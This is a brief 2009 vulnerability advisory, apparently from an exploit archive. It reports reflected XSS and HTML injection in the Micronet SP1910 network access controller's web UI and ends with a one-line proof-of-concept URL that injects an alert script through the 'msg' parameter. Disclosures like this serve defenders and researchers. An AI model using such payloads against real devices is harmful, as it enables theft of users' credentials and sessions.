22 lines
No EOL
840 B
Text
22 lines
No EOL
840 B
Text
# Exploit: XSS & Html code injection in Micronet SP1910 data access controller UI
|
|
# Date: 27-11-2009
|
|
# Author: K053
|
|
# Vendor: http://www.micronet.info/model_detail.aspx?series_no=6&sno=472
|
|
# Tested on : Private Networks
|
|
|
|
------------------------------------------------------------------------------------
|
|
Note :
|
|
|
|
Micronet introduces an exciting new product—SP1910 Network Access Controller. It is
|
|
specially designed for secure wired and wireless network environments of small or
|
|
medium companies. Micronet UI is vulnerable to xss attack .
|
|
|
|
Attacker able to steal users credential and disconnect them .
|
|
|
|
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-
|
|
|
|
POC :
|
|
|
|
you can spot xss any page ,
|
|
|
|
http://server/loginpages/error_user.shtml?uname=userid&msg=<script>alert('xss')</script> |